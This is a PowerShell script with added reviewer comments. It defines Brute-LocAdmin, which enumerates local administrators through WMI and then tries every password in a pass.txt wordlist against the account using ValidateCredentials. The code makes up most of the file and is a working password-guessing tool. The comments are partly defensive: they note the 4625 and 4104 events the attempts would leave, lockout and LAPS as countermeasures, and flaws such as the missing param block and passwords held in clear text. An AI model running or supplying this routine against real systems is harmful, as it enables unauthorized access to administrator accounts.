- <#
- .Synopsis
- Brute-forces the local Administrator account. If no name is provided, it attempts to find one by searching the local Administrators group using WMI.
- .DESCRIPTION
- Brute-forces the local Administrator account. If no name is provided, it attempts to find one by searching the local Administrators group using WMI.
- .EXAMPLE
- PS C:\> Brute-LocAdmin -Username Adm-User
- #>
- Function Brute-LocAdmin
- {
- # NOTE(review): the help example passes -Username, but no param() block is visible in this listing;
- # $username and $StopOnSuccess are therefore only set here if they come from an enclosing scope.
- # Defender view: every candidate below is a real credential validation against the local machine
- # context, so a run should surface as a burst of failed logons for a single account
- # (Security event 4625 when logon auditing is enabled -- confirm for this API path).
- # Account lockout policy and unique per-host local administrator passwords (e.g. Windows LAPS)
- # are the usual controls against this kind of guessing.
- Add-Type -assemblyname System.DirectoryServices.AccountManagement
- # Validates one username/password pair against the machine (local) context and returns an
- # object with Username, Password and IsValid (the boolean result converted to a string).
- Function Test-LocAdminCred
- {
- Param($username, $password)
- # $computer is assigned but not read again inside this helper.
- $computer = $env:COMPUTERNAME
- $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
- $object = New-Object PSObject | Select-Object Username, Password, IsValid
- $object.Username = $username;
- # The candidate password is kept in clear text on the result object, so anything that records
- # pipeline output (transcripts, console logs) will capture every password that was tried.
- $object.Password = $password;
- $object.IsValid = $DS.ValidateCredentials($username, $password).ToString();
- return $object
- }
- # No username supplied: default to 'Administrator', then enumerate Win32_GroupUser through WMI
- # and keep the rows whose GroupComponent ends in "Administrators".
- # Defender view: this enumeration and the loop further down are recorded by PowerShell script
- # block logging (event 4104) when that logging is enabled.
- if (!$username)
- {
- $username = 'Administrator'
- $admins = Get-WmiObject win32_groupuser
- $admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}
- $admins |% {
- # Members that are themselves groups (PartComponent contains "Win32_Group") are skipped.
- if (!$_.partcomponent.contains("Win32_Group")) {
- # The regex captures the Domain and Name parts of PartComponent; $matches[2] is the Name.
- $_.partcomponent -match ".+Domain\=(.+)\,Name\=(.+)$" > $nul
- Write-Host "Administrator not provided, found user: $username"
- # Each non-group member overwrites $username.
- $username = $matches[2].trim('"')
- }
- }
- }
- # Candidate passwords are read from pass.txt, a relative path resolved against the current location.
- $allpasswords = Get-Content pass.txt
- # $counter is incremented per attempt but not read anywhere in this listing.
- $counter = 0
- foreach ($password in $allpasswords)
- {
- $counter++
- $result = Test-LocAdminCred $username $password
- # Every attempt's result object (valid or not) is written to the output stream.
- $result
- # The loop only ends early when $StopOnSuccess equals 'True' and the attempt validated;
- # in that case the successful result is written a second time before the break.
- if (($StopOnSuccess -eq 'True') -and ($result.IsValid -eq 'True')){
- $break = $true
- $result
- }
- if ($break -eq 'True'){break}
- }
- }